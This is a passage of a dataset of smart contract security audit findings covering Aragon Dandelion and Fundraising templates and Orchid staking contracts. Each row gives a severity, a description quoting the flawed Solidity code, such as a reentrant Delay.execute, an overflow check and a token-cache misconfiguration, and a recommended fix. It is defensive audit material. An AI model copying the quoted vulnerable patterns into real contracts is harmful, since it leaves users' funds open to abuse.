@param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n\\nCreate a new dao instance using Aragon's `BaseTemplate` contract:\\n```\\n/\\*\\*\\n\\* @dev Deploy a Dandelion Org DAO using a previously saved MiniMe token\\n\\* @param \\_id String with the name for org, will assign `[id].aragonid.eth`\\n\\* @param \\_holders Array of token holder addresses\\n\\* @param \\_stakes Array of token stakes for holders (token has 18 decimals, multiply token amount `\\* 10^18`)\\n\\* @param \\_useAgentAsVault Boolean to tell whether to use an Agent app as a more advanced form of Vault app\\n\\*/\\nfunction newBaseInstance(\\n string memory \\_id,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n public\\n{\\n \\_validateId(\\_id);\\n \\_ensureBaseSettings(\\_holders, \\_stakes);\\n\\n (Kernel dao, ACL acl) = \\_createDAO();\\n \\_setupBaseApps(dao, acl, \\_holders, \\_stakes, \\_financePeriod, \\_useAgentAsVault);\\n}\\n```\\n\\nSet up prepackaged Aragon apps, like `Vault`, `TokenManager`, and Finance:\\n```\\nfunction \\_setupBaseApps(\\n Kernel \\_dao,\\n ACL \\_acl,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n internal\\n{\\n MiniMeToken token = \\_getToken();\\n Vault agentOrVault = \\_useAgentAsVault ? \\_installDefaultAgentApp(\\_dao) : \\_installVaultApp(\\_dao);\\n TokenManager tokenManager = \\_installTokenManagerApp(\\_dao, token, TOKEN\\_TRANSFERABLE, TOKEN\\_MAX\\_PER\\_ACCOUNT);\\n Finance finance = \\_installFinanceApp(\\_dao, agentOrVault, \\_financePeriod == 0 ? DEFAULT\\_FINANCE\\_PERIOD : \\_financePeriod);\\n\\n \\_mintTokens(\\_acl, tokenManager, \\_holders, \\_stakes);\\n \\_saveBaseApps(\\_dao, finance, tokenManager, agentOrVault);\\n \\_saveAgentAsVault(\\_dao, \\_useAgentAsVault);\\n\\n}\\n```\\n\\nNote that `newToken` and `newBaseInstance` can be called separately. The token created in `newToken` is cached in `_saveToken`, which overwrites any previously-cached value:\\n```\\nfunction \\_saveToken(MiniMeToken \\_token) internal {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n\\n senderDeployedContracts.token = address(\\_token);\\n}\\n```\\n\\nCached tokens are retrieved in _getToken:\\n```\\nfunction \\_getToken() internal returns (MiniMeToken) {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n require(senderDeployedContracts.token != address(0), ERROR\\_MISSING\\_TOKEN\\_CONTRACT);\\n\\n MiniMeToken token = MiniMeToken(senderDeployedContracts.token);\\n return token;\\n}\\n```\\n\\nBy exploiting the overwriteable caching mechanism, it is possible to intentionally misconfigure Dandelion orgs.\\n`installDandelionApps` uses `_getToken` to associate a token with the `DandelionVoting` app. The value returned from `_getToken` depends on the sender's previous call to `newToken`, which overwrites any previously-cached value. The steps for intentional misconfiguration are as follows:\\nSender calls `newTokenAndBaseInstance`, creating token `m0` and DAO `A`.\\nThe `TokenManager` app in `A` is automatically configured to be the controller of `m0`.\\n`m0` is cached using `_saveToken`.\\nDAO `A` apps are cached for future use using `_saveBaseApps` and `_saveAgentAsVault`.\\nSender calls `newToken`, creating token `m1`, and overwriting the cache of `m0`.\\nFuture calls to `_getToken` will retrieve `m1`.\\nThe `DandelionOrg` contract is the controller of `m1`.\\nSender calls `installDandelionApps`, which installs Dandelion apps in DAO `A`\\nThe `DandelionVoting` app is configured to use the current cached token, `m1`, rather than the token associated with `A.TokenManager`, `m0`\\nFurther calls to `newBaseInstance` and `installDandelionApps` create DAO `B`, populate it with Dandelion apps, and assign `B.TokenManager` as the controller of the earlier `DandelionVoting` app token, `m0`.\\nMany different misconfigurations are possible, and some may be underhandedly abusable.",Make `newToken` and `newBaseInstance` internal so they are only callable via `newTokenAndBaseInstance`.,,"```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n" +Delay.execute can re-enter and re-execute the same script twice,low,"`Delay.execute` does not follow the “checks-effects-interactions” pattern, and deletes a delayed script only after the script is run. Because the script being run executes arbitrary external calls, a script can be created that re-enters `Delay` and executes itself multiple times before being deleted:\\n```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\n","Add the `Delay` contract address to the `runScript` blacklist, or delete the delayed script from storage before it is run.",,"```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\n" +Delay.cancelExecution should revert on a non-existent script id,low,"`cancelExecution` makes no existence check on the passed-in script ID, clearing its storage slot and emitting an event:\\n```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\n",Add a check that the passed-in script exists.,,```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\n +ID validation check missing for installDandelionApps,low,"`DandelionOrg` allows users to kickstart an Aragon organization by using a dao template. There are two primary functions to instantiate an org: `newTokenAndBaseInstance`, and `installDandelionApps`. Both functions accept a parameter, `string _id`, meant to represent an ENS subdomain that will be assigned to the new org during the instantiation process. The two functions are called independently, but depend on each other.\\nIn `newTokenAndBaseInstance`, a sanity check is performed on the `_id` parameter, which ensures the `_id` length is nonzero:\\n```\\n\\_validateId(\\_id);\\n```\\n\\nNote that the value of `_id` is otherwise unused in `newTokenAndBaseInstance`.\\nIn `installDandelionApps`, this check is missing. The check is only important in this function, since it is in `installDandelionApps` that the ENS subdomain registration is actually performed.","Use `_validateId` in `installDandelionApps` rather than `newTokenAndBaseInstance`. Since the `_id` parameter is otherwise unused in `newTokenAndBaseInstance`, it can be removed.\\nAlternatively, the value of the submitted `_id` could be cached between calls and validated in `newTokenAndBaseInstance`, similarly to `newToken`.",,```\\n\\_validateId(\\_id);\\n```\\n +EOPBCTemplate - permission documentation inconsistencies,high,"Undocumented\\nThe template documentation provides an overview of the permissions set with the template. The following permissions are set by the template contract but are not documented in the accompanied `fundraising/templates/externally_owned_presale_bonding_curve/README.md`.\\nTokenManager\\n```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n\\ncode/fundraising/templates/externally_owned_presale_bonding_curve/eopbc.yaml:L33-L44\\n```\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: market-maker\\n manager: owner\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: presale\\n manager: owner\\n- app: anj-token-manager\\n role: BURN\\_ROLE\\n grantee: market-maker\\n manager: owner\\n```\\n\\nInconsistent\\nThe following permissions are set by the template but are inconsistent to the outline in the documentation:\\nController\\n`owner` has the following permissions even though they are documented as not being set https://github.com/ConsenSys/aragonone-presale-audit-2019-11/blob/9ddae8c7fde9dea3af3982b965a441239d81f370/code/fundraising/templates/externally_owned_presale_bonding_curve/README.md#controller.\\n```\\n| App | Permission | Grantee | Manager |\\n| ---------- | ------------------------------------- | ------- | ------- |\\n| Controller | UPDATE_BENEFICIARY | NULL | NULL |\\n| Controller | UPDATE_FEES | NULL | NULL |\\n| Controller | ADD_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | REMOVE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_MAXIMUM_TAP_RATE_INCREASE_PCT | NULL | NULL |\\n| Controller | UPDATE_MAXIMUM_TAP_FLOOR_DECREASE_PCT | NULL | NULL |\\n| Controller | ADD_TOKEN_TAP | NULL | NULL |\\n| Controller | UPDATE_TOKEN_TAP | NULL | NULL |\\n| Controller | OPEN_PRESALE | Owner | Owner |\\n| Controller | OPEN_TRADING | Presale | Owner |\\n| Controller | CONTRIBUTE | Any | Owner |\\n| Controller | OPEN_BUY_ORDER | Any | Owner |\\n| Controller | OPEN_SELL_ORDER | Any | Owner |\\n| Controller | WITHDRAW | NULL | NULL |\\n```\\n\\n```\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_BENEFICIARY\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_FEES\\_ROLE(), \\_owner);\\n```\\n","Resolution\\nFixed with aragonone/[email protected]bafe100 by adding the undocumented and deviating permissions to the documentation.\\nFor transparency, all permissions set-up by the template must be documented.",,"```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n" +EOPBCTemplate - AppId of BalanceRedirectPresale should be different from AragonBlack/Presale namehash to avoid collisions,high,"The template references the new presale contract with `apmNamehash` `0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5`. However, this namehash is already used by the aragonBlack/Presale contract. To avoid confusion and collision a unique `apmNamehash` should be used for this variant of the contract.\\nNote that the contract that is referenced from an `apmNamehash` is controlled by the `ENS` resolver that is configured when deploying the template contract. Using the same namehash for both variants of the contract does not allow a single registry to simultaneously provide both variants of the contract and might lead to confusion as to which application is actually deployed. This also raises the issue that the `ENS` registry must be verified before actually using the contract as a malicious registry could force the template to deploy potentially malicious applications.\\naragonOne/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\naragonBlack/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\n`bytes32 private constant PRESALE_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;`",Create a new `apmNamehash` for `BalanceRedirectPresale`.,,```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n +BalanceRedirectPresale - Presale can be extended indefinitely Won't Fix,high,"The `OPEN_ROLE` can indefinitely extend the Presale even after users contributed funds to it by adjusting the presale period. The period might be further manipulated to avoid that token trading in the MarketMaker is opened.\\n```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n",Do not allow to extend the presale after funds have been contributed to it or only allow period adjustments in `State.PENDING`.,,```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n +BalanceRedirectPresale - setPeriod uint64 overflow in validation check,medium,"`setPeriod()` allows setting an arbitrary Presale starting date. The method can be called by an entity with the `OPEN_ROLE` permission. Providing a large enough value for `uint64 _period` can overflow the second input validation check. The result is unwanted behaviour where for relatively large values of `period` the require might fail because the overflow `openDate + _period` is less than or equal the current timestamp (getTimestamp64()) but if high enough it still might succeed because `openDate + _period` is higher than the current timestamp. The overflow has no effect on the presale end as it is calculated against `_timeSinceOpen`.\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n\\n",Resolution\\nFixed with aragonone/[email protected]bafe100 by performing the addition using `SafeMath`.\\nUse `SafeMath` which is already imported to protect from overflow scenarios.,,"```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n" +EOPBCTemplate - misleading method names _cacheFundraisingApps and _cacheFundraisingParams,low,"The methods `_cacheFundraisingApps` and `_cacheFundraisingParams` suggest that parameters are cached as state variables in the contract similar to the multi-step deployment contract used for AragonBlack/Fundraising. However, the methods are just returning memory structs.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\n",The functions are only called once throughout the deployment process. The structs can therefore be created directly in the main method. Otherwise rename the functions to properly reflect their purpose.,,"```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\n" +EOPBCTemplate - inconsistent storage location declaration,low,"`_cacheFundraisingParams()` does not explicitly declare the return value memory location.\\n```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n\\n`_cacheFundraisingApps()` explicitly declares to return a copy of the storage struct.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n```\\n",Resolution\\nFixed with aragonone/[email protected]bafe100 by adding the missing storage location declaration.\\nStorage declarations should be consistent.,,"```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n" +EOPBCTemplate - EtherTokenConstant is never used,low,"The constant value `EtherTokenConstant.ETH` is never used.\\n```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\n",Resolution\\nFixed with aragonone/[email protected]bafe100 by removing the `EtherTokenConstant` dependency.\\nRemove all references to `EtherTokenConstant`.,,"```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\n" +Staking node can be inappropriately removed from the tree,high,"The following code in `OrchidDirectory.pull()` is responsible for reattaching a child from a removed tree node:\\n```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n\\nThe condition name(stake.left_) == `key` can never hold because `key` is the `key` for `stake` itself.\\nThe result of this bug is somewhat catastrophic. The child is not reattached, but it still has a link to the rest of the tree via its ‘parent_' pointer. This means reducing the stake of that node can underflow the ancestors' before/after amounts, leading to improper random selection or failing altogether.\\nThe node replacing the removed node also ends up with itself as a child, which violates the basic tree structure and is again likely to produce integer underflows and other failures.","As a simple fix, use `if(name(stake.left_) == name(last))` as already suggested by the development team when this bug was first shared.\\nTwo suggestions for better long-term fixes:\\nUse a strict interface for tree operations. It should be impossible to update a node's parent without simultaneously updating that parent's child pointer.\\nAs suggested in (https://github.com/ConsenSys/orchid-audit-2019-10/issues/7), simplify the logic in `pull()` to avoid this logic altogether.",,```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n +"Verifiers need to be pure, but it's very difficult to validate pureness",medium,"After the initial audit, a “verifier” was introduced to the `OrchidLottery` code. Each `Pot` can have an associated `OrchidVerifier`. This is a contract with a `good()` function that accepts three parameters:\\n```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n\\nThe verifier returns a boolean indicating whether a given micropayment should be allowed or not. An example use case is a verifier that only allows certain `target` addresses to be paid. In this case, `shared` (a single value for a given Pot) is a merkle root, `target` is (as always) the address being paid, and `receipt` (specified by the payment recipient) is a merkle proof that the `target` address is within the merkle tree with the given root.\\nA server providing bandwidth needs to know whether to accept a certain receipt. To do that, it needs to know that at some time in the future, a call to the verifier's `good()` function with a particular set of parameters will return `true`. The proposed scheme for determining that is for the server to run the contract's code locally and ensure that it returns `true` and that it doesn't execute any EVM opcodes that would read state. This prevents, for example, a contract from returning `true` until a certain timestamp and then start returning `false`. If a contract could do that, the server would be tricked into providing bandwidth without then receiving payment.\\nUnfortunately, this simple scheme is insufficient. As a simple example, a verifier contract could be created with the `CREATE2` opcode. It could be demonstrated that it reads no state when `good()` is called. Then the contract could be destroyed by calling a function that performs a `SELFDESTRUCT`, and it could be replaced via another `CREATE2` call with different code.\\nThis could be mitigated by rejecting any verifier contract that contains the `SELFDESTRUCT` opcode, but this would also catch harmless occurrences of that particular byte. https://gist.github.com/Arachnid/e8f0638dc9f5687ff8170a95c47eac1e attempts to find `SELFDESTRUCT` opcodes but fails to account for tricks where the `SELFDESTRUCT` appears to be data but can actually be executed. (See Recmo's comment.) In general, this approach is difficult to get right and probably requires full data flow analysis to be correct.\\nAnother possible mitigation is to use a factory contract to deploy the verifiers, guaranteeing that they're not created with `CREATE2`. This should render `SELFDESTRUCT` harmless, but there's no guarantee that future forks won't introduce new vectors here.\\nFinally, requiring servers to implement potentially complex contract validation opens up potential for denial-of-service attacks. A server will have to implement mitigations to prevent repeatedly checking the same verifier or spending inordinate resources checking a maliciously crafted contract (e.g. one with high branching factors).","The verifiers add quite a bit of complexity and risk. We recommend looking for an alternative approach, such as including a small number of vetted verifiers (e.g. a merkle proof verifier) or having servers use their own “allow list” for verifiers that they trust.",,"```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n" +"Use consistent staker, stakee ordering in OrchidDirectory",low,"```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n\\n`OrchidDirectory.lift()` has a parameter `stakee` that precedes `staker`, while the rest of the code always places `staker` first. Because Solidity doesn't have named parameters, it's a good idea to use a consistent ordering to avoid mistakes.",Resolution\\nThis is fixed in OrchidProtocol/[email protected]1cfef88.\\nSwitch `lift()` to follow the “staker then stakee” ordering convention of the rest of the contract.,,"```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n" +"In OrchidDirectory.step() and OrchidDirectory.lift(), use a signed amount Won't Fix",low,"`step()` and `lift()` both accept a `uint128` parameter called `amount`. This `amount` is added to various struct fields, which are also of type `uint128`.\\nThe contract intentionally underflows this `amount` to represent negative numbers. This is roughly equivalent to using a signed integer, except that:\\nUnsigned integers aren't sign extended when they're cast to a larger integer type, so care must be taken to avoid this.\\nTools that look for integer overflow/underflow will detect this possibility as a bug. It's then hard to determine which overflows are intentional and which are not.\\n```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n\\n```\\nstep(key, stake, -current.amount\\_, current.parent\\_);\\n```\\n","Resolution\\nThe variables in question are now uint256s. The amount of type casts that would be needed in case the recommended change was implemented would defeat the purpose of simplification.\\nUse `int128` instead, and ensure that amounts can never exceed the maximum `int128` value. (This is trivially achieved by limiting the total number of tokens that can exist.)",,"```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n" +Document that math in OrchidDirectory assumes a maximum number of tokens,low,"`OrchidDirectory` relies on mathematical operations being unable to overflow due to the particular ERC20 token being used being capped at less than `2**128`.\\nThe following code in `step()` assumes that no before/after amount can reach 2**128:\\n```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n\\nThe following code in `lift()` assumes that no staked amount (or total amount for a given stakee) can reach 2**128:\\n```\\nuint128 local = stake.amount\\_;\\nlocal += amount;\\nstake.amount\\_ = local;\\nemit Update(staker, stakee, local);\\n\\nuint128 global = stakees\\_[stakee].amount\\_;\\nglobal += amount;\\nstakees\\_[stakee].amount\\_ = global;\\n```\\n\\nThe following code in `have()` assumes that the total amount staked cannot reach 2**128:\\n```\\nreturn stake.before\\_ + stake.after\\_ + stake.amount\\_;\\n```\\n",Document this assumption in the form of code comments where potential overflows exist.\\nConsider also asserting the ERC20 token's total supply in the constructor to attempt to block using a token that violates this constraint and/or checking in `push()` that the total amount staked will remain less than `2**128`. This recommendation is in line with the mitigation proposed for issue 6.7.,,```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n +Fees can be changed during the batch,high,"Shareholders can vote to change the fees. For buy orders, fees are withdrawn immediately when order is submitted and the only risk is frontrunning by the shareholder's voting contract.\\nFor sell orders, fees are withdrawn when a trader claims an order and withdraws funds in `_claimSellOrder` function:\\n```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n\\nFees can be changed between opening order and claiming this order which makes the fees unpredictable.",Resolution\\nFixed with AragonBlack/[email protected]0941f53 by storing current fee in meta batch.\\nFees for an order should not be updated during its lifetime.,,"```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n" +Bancor formula should not be updated during the batch,high,"Shareholders can vote to change the bancor formula contract. That can make a price in the current batch unpredictable.\\n```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\n",Bancor formula update should be executed in the next batch or with a timelock that is greater than batch duration.,,"```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\n" +Maximum slippage shouldn't be updated for the current batch,high,"When anyone submits a new order, the batch price is updated and it's checked whether the price slippage is acceptable. The problem is that the maximum slippage can be updated during the batch and traders cannot be sure that price is limited as they initially expected.\\n```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n\\nAdditionally, if a maximum slippage is updated to a lower value, some of the orders that should lower the current slippage will also revert.",Save a slippage value on batch initialization and use it during the current batch.,,"```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n" +AragonFundraisingController - an untapped address in toReset can block attempts of opening Trading after presale,high,"AragonFundraisingController can be initialized with a list of token addresses `_toReset` that are to be reset when trading opens after the presale. These addresses are supposed to be addresses of tapped tokens. However, the list needs to be known when initializing the contract but the tapped tokens are added after initialization when calling `addCollateralToken` (and tapped with _rate>0). This can lead to an inconsistency that blocks `openTrading`.\\n```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n\\nIn case a token address makes it into the list of `toReset` tokens that is not tapped it will be impossible to `openTrading` as `tap.resetTappedToken(toReset[i]);` throws for untapped tokens. According to the permission setup in `FundraisingMultisigTemplate` only Controller can call `Marketmaker.open`\\n```\\nfunction openTrading() external auth(OPEN\\_TRADING\\_ROLE) {\\n for (uint256 i = 0; i < toReset.length; i++) {\\n tap.resetTappedToken(toReset[i]);\\n }\\n\\n marketMaker.open();\\n}\\n```\\n","Instead of initializing the Controller with a list of tapped tokens to be reset when trading opens, add a flag to `addCollateralToken` to indicate that the token should be reset when calling `openTrading`, making sure only tapped tokens are added to this list. This also allows adding tapped tokens that are to be reset at a later point in time.",,"```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n" +[New] Tapped collaterals can be bought by traders Won't 